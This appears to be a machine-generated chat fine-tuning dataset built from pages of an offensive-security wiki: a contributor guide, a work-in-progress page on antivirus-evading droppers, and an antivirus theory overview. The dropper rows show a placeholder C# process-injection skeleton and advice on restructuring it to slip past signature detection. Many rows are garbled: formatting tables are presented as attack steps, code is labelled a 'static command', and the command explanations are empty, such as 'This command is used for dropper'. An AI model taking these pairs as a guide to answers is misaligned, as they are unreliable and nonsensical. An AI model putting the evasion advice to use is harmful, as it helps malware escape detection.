I know about Guide for authors 📝 - Variable Naming Standards?"}, {"role": "assistant", "content": "| Use This | Instead Of |\n|-------------------|------------------------------------------------|\n| $NT_HASH | $NThash, $nthash, $Nthash |\n| $LM_HASH | $LMhash, $lmhash, $Lmhash |\n| $ATTACKER_IP | $attackerIP, $attacker_ip, $LHOST |\n| $TARGET | $TARGET_IP, $targetIP, $target_ip |\n| $DOMAIN | $domain, $DOMAIN_NAME |\n| $DC_IP | $dc_ip, $dcIP, $domainController |\n| $USER | $user, $username, $USER_NAME |\n| $INTERFACE | $interface, $network_interface |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Guide for authors 📝 - Variable Naming Standards?", "response": "| Use This | Instead Of |\n|-------------------|------------------------------------------------|\n| $NT_HASH | $NThash, $nthash, $Nthash |\n| $LM_HASH | $LMhash, $lmhash, $Lmhash |\n| $ATTACKER_IP | $attackerIP, $attacker_ip, $LHOST |\n| $TARGET | $TARGET_IP, $targetIP, $target_ip |\n| $DOMAIN | $domain, $DOMAIN_NAME |\n| $DC_IP | $dc_ip, $dcIP, $domainController |\n| $USER | $user, $username, $USER_NAME |\n| $INTERFACE | $interface, $network_interface |", "metadata": {"corpus_index": 1347, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Guide for authors 📝 - Variable Naming Standards?"}, {"role": "assistant", "content": "| Use This | Instead Of |\n|-------------------|------------------------------------------------|\n| $NT_HASH | $NThash, $nthash, $Nthash |\n| $LM_HASH | $LMhash, $lmhash, $Lmhash |\n| $ATTACKER_IP | $attackerIP, $attacker_ip, $LHOST |\n| $TARGET | $TARGET_IP, $targetIP, $target_ip |\n| $DOMAIN | $domain, $DOMAIN_NAME |\n| $DC_IP | $dc_ip, $dcIP, $domainController |\n| $USER | $user, $username, $USER_NAME |\n| $INTERFACE | $interface, $network_interface |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Guide for authors 📝 - Variable Naming Standards?", "response": "| Use This | Instead Of |\n|-------------------|------------------------------------------------|\n| $NT_HASH | $NThash, $nthash, $Nthash |\n| $LM_HASH | $LMhash, $lmhash, $Lmhash |\n| $ATTACKER_IP | $attackerIP, $attacker_ip, $LHOST |\n| $TARGET | $TARGET_IP, $targetIP, $target_ip |\n| $DOMAIN | $domain, $DOMAIN_NAME |\n| $DC_IP | $dc_ip, $dcIP, $domainController |\n| $USER | $user, $username, $USER_NAME |\n| $INTERFACE | $interface, $network_interface |", "metadata": {"corpus_index": 1347, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Guide for authors 📝 - Implementation Tips"}, {"role": "assistant", "content": "1. When updating documentation, standardize any variable names you encounter\n2. Use ALL_CAPS with underscore separators for all variables\n3. For tool-specific variables, maintain consistency with our naming convention\n4. Include brief comments when introducing new variables\n5. Variables must be prefixed with $ to be recognized by our substitution system"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Guide for authors 📝 - Implementation Tips", "response": "1. When updating documentation, standardize any variable names you encounter\n2. Use ALL_CAPS with underscore separators for all variables\n3. For tool-specific variables, maintain consistency with our naming convention\n4. Include brief comments when introducing new variables\n5. Variables must be prefixed with $ to be recognized by our substitution system", "metadata": {"corpus_index": 1348, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Guide for authors 📝 - Implementation Tips"}, {"role": "assistant", "content": "1. When updating documentation, standardize any variable names you encounter\n2. Use ALL_CAPS with underscore separators for all variables\n3. For tool-specific variables, maintain consistency with our naming convention\n4. Include brief comments when introducing new variables\n5. Variables must be prefixed with $ to be recognized by our substitution system"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Guide for authors 📝 - Implementation Tips", "response": "1. When updating documentation, standardize any variable names you encounter\n2. Use ALL_CAPS with underscore separators for all variables\n3. For tool-specific variables, maintain consistency with our naming convention\n4. Include brief comments when introducing new variables\n5. Variables must be prefixed with $ to be recognized by our substitution system", "metadata": {"corpus_index": 1348, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Guide for authors 📝 - Get started :rocket:?"}, {"role": "assistant", "content": "1. Fork the repository (https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/fork)\n2. (optional) create a new branch in your fork, if you plan on working on different topics\n3. Create your content using this guide, and the template if needed\n4. Make sure the content builds fine with npm install && npm run docs:dev\n5. Make a Pull Request (https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/compare)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Guide for authors 📝 - Get started :rocket:?", "response": "1. Fork the repository (https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/fork)\n2. (optional) create a new branch in your fork, if you plan on working on different topics\n3. Create your content using this guide, and the template if needed\n4. Make sure the content builds fine with npm install && npm run docs:dev\n5. Make a Pull Request (https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/compare)", "metadata": {"corpus_index": 1349, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Guide for authors 📝 - Get started :rocket:"}, {"role": "assistant", "content": "1. Fork the repository (https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/fork)\n2. (optional) create a new branch in your fork, if you plan on working on different topics\n3. Create your content using this guide, and the template if needed\n4. Make sure the content builds fine with npm install && npm run docs:dev\n5. Make a Pull Request (https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/compare)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Guide for authors 📝 - Get started :rocket:", "response": "1. Fork the repository (https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/fork)\n2. (optional) create a new branch in your fork, if you plan on working on different topics\n3. Create your content using this guide, and the template if needed\n4. Make sure the content builds fine with npm install && npm run docs:dev\n5. Make a Pull Request (https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/compare)", "metadata": {"corpus_index": 1349, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ Dropper"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs\n\nAs for the loader, it is also possible to make a simple one, but the more complex it is, the more likely it is that the anti-virus will not see it\n\nKnowing that an anti-virus compares the signature of our program and the signature of the functions with those of the malware, it is up to the attacker to use his imagination to disguise his program.\n\nIn the example below, the anti-virus will raise an alert:\n\n``cpp\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n`\n\nBut, if a sub function is added to create a thread as follow:\n\n`cpp\nstatic void CRT()\n{\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n CRT()\n}\n``\n\nBy using the previous source code the anti-virus will have more difficulty to understand what is happening. The Russian doll technique can be a good trick to hide a malicious function.\n\n> [!CAUTION]\n> The fact of compiling several times will not give us a new signature, only the modification of the code has an impact\n\n> [!CAUTION]\n> Once the binary is ready to be executed, access to the internet should be cut in the test environment in order not to send the signature of the bypass to Microsoft or to the editor.\n\nTo optimize the probability"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ Dropper", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs\n\nAs for the loader, it is also possible to make a simple one, but the more complex it is, the more likely it is that the anti-virus will not see it\n\nKnowing that an anti-virus compares the signature of our program and the signature of the functions with those of the malware, it is up to the attacker to use his imagination to disguise his program.\n\nIn the example below, the anti-virus will raise an alert:\n\n``cpp\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n`\n\nBut, if a sub function is added to create a thread as follow:\n\n`cpp\nstatic void CRT()\n{\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n CRT()\n}\n``\n\nBy using the previous source code the anti-virus will have more difficulty to understand what is happening. The Russian doll technique can be a good trick to hide a malicious function.\n\n> [!CAUTION]\n> The fact of compiling several times will not give us a new signature, only the modification of the code has an impact\n\n> [!CAUTION]\n> Once the binary is ready to be executed, access to the internet should be cut in the test environment in order not to send the signature of the bypass to Microsoft or to the editor.\n\nTo optimize the probability", "metadata": {"corpus_index": 1350, "category": "active_directory", "source_file": "docs/src/evasion/av/dropper.md", "page_title": "🛠️ Dropper", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Dropper?"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs\n\nAs for the loader, it is also possible to make a simple one, but the more complex it is, the more likely it is that the anti-virus will not see it\n\nKnowing that an anti-virus compares the signature of our program and the signature of the functions with those of the malware, it is up to the attacker to use his imagination to disguise his program.\n\nIn the example below, the anti-virus will raise an alert:\n\n``cpp\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n`\n\nBut, if a sub function is added to create a thread as follow:\n\n`cpp\nstatic void CRT()\n{\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n CRT()\n}\n``\n\nBy using the previous source code the anti-virus will have more difficulty to understand what is happening. The Russian doll technique can be a good trick to hide a malicious function.\n\n> [!CAUTION]\n> The fact of compiling several times will not give us a new signature, only the modification of the code has an impact\n\n> [!CAUTION]\n> Once the binary is ready to be executed, access to the internet should be cut in the test environment in order not to send the signature of the bypass to Microsoft or to the editor.\n\nTo optimize the probability"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Dropper?", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs\n\nAs for the loader, it is also possible to make a simple one, but the more complex it is, the more likely it is that the anti-virus will not see it\n\nKnowing that an anti-virus compares the signature of our program and the signature of the functions with those of the malware, it is up to the attacker to use his imagination to disguise his program.\n\nIn the example below, the anti-virus will raise an alert:\n\n``cpp\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n`\n\nBut, if a sub function is added to create a thread as follow:\n\n`cpp\nstatic void CRT()\n{\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n CRT()\n}\n``\n\nBy using the previous source code the anti-virus will have more difficulty to understand what is happening. The Russian doll technique can be a good trick to hide a malicious function.\n\n> [!CAUTION]\n> The fact of compiling several times will not give us a new signature, only the modification of the code has an impact\n\n> [!CAUTION]\n> Once the binary is ready to be executed, access to the internet should be cut in the test environment in order not to send the signature of the bypass to Microsoft or to the editor.\n\nTo optimize the probability", "metadata": {"corpus_index": 1350, "category": "active_directory", "source_file": "docs/src/evasion/av/dropper.md", "page_title": "🛠️ Dropper", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the static command to 🛠️ dropper"}, {"role": "assistant", "content": "static void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the static command to 🛠️ dropper", "response": "static void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}", "metadata": {"corpus_index": 1351, "category": "active_directory", "source_file": "docs/src/evasion/av/dropper.md", "page_title": "🛠️ Dropper", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "static"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Dropper"}, {"role": "assistant", "content": "static void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Dropper", "response": "static void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}", "metadata": {"corpus_index": 1351, "category": "active_directory", "source_file": "docs/src/evasion/av/dropper.md", "page_title": "🛠️ Dropper", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `static void Main(string[] args)`?"}, {"role": "assistant", "content": "This command is used for 🛠️ dropper. 🛠️ Dropper"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `static void Main(string[] args)`?", "response": "This command is used for 🛠️ dropper. 🛠️ Dropper", "metadata": {"corpus_index": 1351, "category": "active_directory", "source_file": "docs/src/evasion/av/dropper.md", "page_title": "🛠️ Dropper", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the static command to 🛠️ dropper"}, {"role": "assistant", "content": "static void CRT()\n{\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n CRT()\n}"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the static command to 🛠️ dropper", "response": "static void CRT()\n{\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n CRT()\n}", "metadata": {"corpus_index": 1352, "category": "active_directory", "source_file": "docs/src/evasion/av/dropper.md", "page_title": "🛠️ Dropper", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "static"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Dropper?"}, {"role": "assistant", "content": "static void CRT()\n{\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n CRT()\n}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Dropper?", "response": "static void CRT()\n{\n IntPtr hThread = CreateRemoteThread(MyTests, xxxxxx);\n}\n\nstatic void Main(string[] args)\n{\n byte[] buf = new byte[xxx]{ 0x27, 0x3B, 0x38, 0x7D, 0xF4, 0x44 }\n IntPtr MyTests = OpenProcess(PROCESS_ALL_ACCESS, false, processId);\n IntPtr addr = VirtualAllocEx(MyTests, IntPtr.Zero, (uint)buf.Length, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(MyTests,xxxxx);\n CRT()\n}", "metadata": {"corpus_index": 1352, "category": "active_directory", "source_file": "docs/src/evasion/av/dropper.md", "page_title": "🛠️ Dropper", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `static void CRT()`?"}, {"role": "assistant", "content": "This command is used for 🛠️ dropper. 🛠️ Dropper"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `static void CRT()`?", "response": "This command is used for 🛠️ dropper. 🛠️ Dropper", "metadata": {"corpus_index": 1352, "category": "active_directory", "source_file": "docs/src/evasion/av/dropper.md", "page_title": "🛠️ Dropper", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of (AV) Anti-Virus - Theory"}, {"role": "assistant", "content": "Most of the anti-virus vendors do not communicate much about the rules they put in place to block malicious software. Consequently, there are 3 main possible options to understand the underground process of an anti-virus:\n\n1. reverse the anti-virus binary\n2. search on the internet if there are any open source AVs that implement certain rules\n3. do regular monitoring\n\nNevertheless, here is a list of known techniques used by anti-viral protections on the market:\n\n* Static analysis: analysis of instructions and control statements in the code to detect known malware signatures.\n* Dynamic analysis: code execution in a virtual environment to detect suspicious behavior.\n* Heuristics: analysis of code characteristics to detect suspicious behavior.\n* Sandboxing: execution of code in a virtual environment to detect suspicious behavior.\n* Signature checking: comparison of suspicious files signature with a database of known malware signatures.\n* Fingerprinting: comparison of suspicious files with a database of known malware fingerprints.\n* Behavioral check: analysis of suspicious behavior of the executed code.\n* Network monitoring: analysis of suspicious network communications.\n* URL control: analysis of suspicious URLs.\n* File control: analysis of suspicious files.\n\n> [!CAUTION]\n> Some AVs have a browser extension that parses the html code for malicious code, be careful during red team operations\n\n> [!TIP]\n> Moreover, depending on the anti-virus installed on the victim's computer, it is possible that some techniques do not work and others do.\n> \n> Therefore, it is strongly advised to set up a virtual machine as close as possible to the victim's computer."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of (AV) Anti-Virus - Theory", "response": "Most of the anti-virus vendors do not communicate much about the rules they put in place to block malicious software. Consequently, there are 3 main possible options to understand the underground process of an anti-virus:\n\n1. reverse the anti-virus binary\n2. search on the internet if there are any open source AVs that implement certain rules\n3. do regular monitoring\n\nNevertheless, here is a list of known techniques used by anti-viral protections on the market:\n\n* Static analysis: analysis of instructions and control statements in the code to detect known malware signatures.\n* Dynamic analysis: code execution in a virtual environment to detect suspicious behavior.\n* Heuristics: analysis of code characteristics to detect suspicious behavior.\n* Sandboxing: execution of code in a virtual environment to detect suspicious behavior.\n* Signature checking: comparison of suspicious files signature with a database of known malware signatures.\n* Fingerprinting: comparison of suspicious files with a database of known malware fingerprints.\n* Behavioral check: analysis of suspicious behavior of the executed code.\n* Network monitoring: analysis of suspicious network communications.\n* URL control: analysis of suspicious URLs.\n* File control: analysis of suspicious files.\n\n> [!CAUTION]\n> Some AVs have a browser extension that parses the html code for malicious code, be careful during red team operations\n\n> [!TIP]\n> Moreover, depending on the anti-virus installed on the victim's computer, it is possible that some techniques do not work and others do.\n> \n> Therefore, it is strongly advised to set up a virtual machine as close as possible to the victim's computer.", "metadata": {"corpus_index": 1353, "category": "network", "source_file": "docs/src/evasion/av/index.md", "page_title": "(AV) Anti-Virus", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through (AV) Anti-Virus - Theory"}, {"role": "assistant", "content": "Most of the anti-virus vendors do not communicate much about the rules they put in place to block malicious software. Consequently, there are 3 main possible options to understand the underground process of an anti-virus:\n\n1. reverse the anti-virus binary\n2. search on the internet if there are any open source AVs that implement certain rules\n3. do regular monitoring\n\nNevertheless, here is a list of known techniques used by anti-viral protections on the market:\n\n* Static analysis: analysis of instructions and control statements in the code to detect known malware signatures.\n* Dynamic analysis: code execution in a virtual environment to detect suspicious behavior.\n* Heuristics: analysis of code characteristics to detect suspicious behavior.\n* Sandboxing: execution of code in a virtual environment to detect suspicious behavior.\n* Signature checking: comparison of suspicious files signature with a database of known malware signatures.\n* Fingerprinting: comparison of suspicious files with a database of known malware fingerprints.\n* Behavioral check: analysis of suspicious behavior of the executed code.\n* Network monitoring: analysis of suspicious network communications.\n* URL control: analysis of suspicious URLs.\n* File control: analysis of suspicious files.\n\n> [!CAUTION]\n> Some AVs have a browser extension that parses the html code for malicious code, be careful during red team operations\n\n> [!TIP]\n> Moreover, depending on the anti-virus installed on the victim's computer, it is possible that some techniques do not work and others do.\n> \n> Therefore, it is strongly advised to set up a virtual machine as close as possible to the victim's computer."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a 